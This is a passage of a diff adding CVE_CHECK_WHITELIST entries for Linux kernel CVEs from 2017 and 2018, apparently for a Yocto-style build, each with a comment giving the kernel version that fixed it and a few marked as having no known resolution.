+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16647"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16648"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16649"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16650"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16911"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16912"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16913"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16914"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16939"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16994"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16995"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16996"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17052"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17053"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17448"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17449"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17450"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17558"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17712"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17741"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17805"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17806"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-17807"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17852"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17853"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17854"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17855"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17856"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17857"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17862"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17863"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17864"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17975"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18017"
+
+# fixed-version: Fixed after version 4.15rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18075"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18079"
+
+# CVE-2017-18169 has no known resolution
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18174"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18193"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-18200"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18202"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18203"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18204"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18208"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18216"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18218"
+
+# fixed-version: Fixed after version 4.12rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18221"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18222"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18224"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18232"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18241"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18249"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18255"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18257"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18261"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18270"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18344"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18360"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18379"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18509"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18549"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18550"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2017-18551"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18552"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18595"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2583"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2584"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2596"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-2618"
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2634"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-2636"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2647"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-2671"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5123"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5546"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5547"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5548"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5549"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5550"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5551"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5576"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5577"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5669"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5715"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5753"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5754"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5897"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5967"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5970"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5972"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5986"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-6001"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6074"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-6214"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6345"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6346"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6347"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6348"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6353"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-6874"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6951"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7184"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7187"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7261"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7273"
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7277"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7294"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7308"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7346"
+
+# CVE-2017-7369 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7374"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7472"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7477"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7482"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7487"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7495"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7518"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7533"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7541"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-7542"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-7558"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7616"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7618"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7645"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7889"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7895"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7979"
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-8061"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8062"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8063"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8064"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8066"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8067"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8068"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8069"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8070"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8071"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8072"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8106"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2017-8240"
+
+# CVE-2017-8242 has no known resolution
+
+# CVE-2017-8244 has no known resolution
+
+# CVE-2017-8245 has no known resolution
+
+# CVE-2017-8246 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8797"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-8824"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8831"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8890"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8924"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8925"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9059"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9074"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9075"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9076"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9077"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9150"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9211"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9242"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-9605"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2017-9725"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9984"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9985"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9986"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-1000004"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1000026"
+
+# fixed-version: Fixed after version 4.15
+CVE_CHECK_WHITELIST += "CVE-2018-1000028"
+
+# fixed-version: Fixed after version 4.16
+CVE_CHECK_WHITELIST += "CVE-2018-1000199"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1000200"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1000204"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10021"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10074"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10087"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10124"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10322"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10323"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-1065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1066"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10675"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1068"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10840"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10853"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1087"
+
+# CVE-2018-10872 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10876"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10877"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10878"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10879"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10880"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10881"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10882"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10883"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10901"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10902"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1091"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1092"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1093"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2018-10938"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1094"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-10940"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1095"
+
+# fixed-version: Fixed after version 4.17rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1108"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1118"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-1120"
+
+# CVE-2018-1121 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11232"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1128"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1129"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1130"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11412"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-11506"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-11508"
+
+# CVE-2018-11987 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12126"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12127"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12130"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12207"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12232"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12233"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12633"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12714"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12896"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12904"
+
+# CVE-2018-12928 has no known resolution
+
+# CVE-2018-12929 has no known resolution
+
+# CVE-2018-12930 has no known resolution
+
+# CVE-2018-12931 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13053"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13093"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13094"
+
+# fixed-version: Fixed after version 4.18rc3
+CVE_CHECK_WHITELIST += "CVE-2018-13095"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13096"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13097"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13098"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13099"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13100"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-13405"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13406"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14609"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14610"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14611"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14612"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14613"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14614"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14615"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14616"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14617"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14619"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14625"
+
+# fixed-version: Fixed after version 4.19rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14633"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14634"
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14641"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14646"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-14656"
+
+# fixed-version: Fixed after version 4.18rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14678"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14734"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-15471"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15572"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15594"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16276"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16597"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-16658"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16862"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-16871"
+
+# fixed-version: Fixed after version 5.0rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16880"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-16882"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16884"
+
+# CVE-2018-16885 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-17182"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-17972"
+
+# CVE-2018-17977 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18021"
+
+# fixed-version: Fixed after version 4.19
+CVE_CHECK_WHITELIST += "CVE-2018-18281"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-18386"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-18397"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18445"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18559"
+
+# CVE-2018-18653 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-18690"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-18710"
+
+# fixed-version: Fixed after version 4.20rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18955"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19406"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19407"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-19824"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-19854"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-19985"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-20169"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-20449"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20509"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-20510"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-20511"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20669"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20784"
+
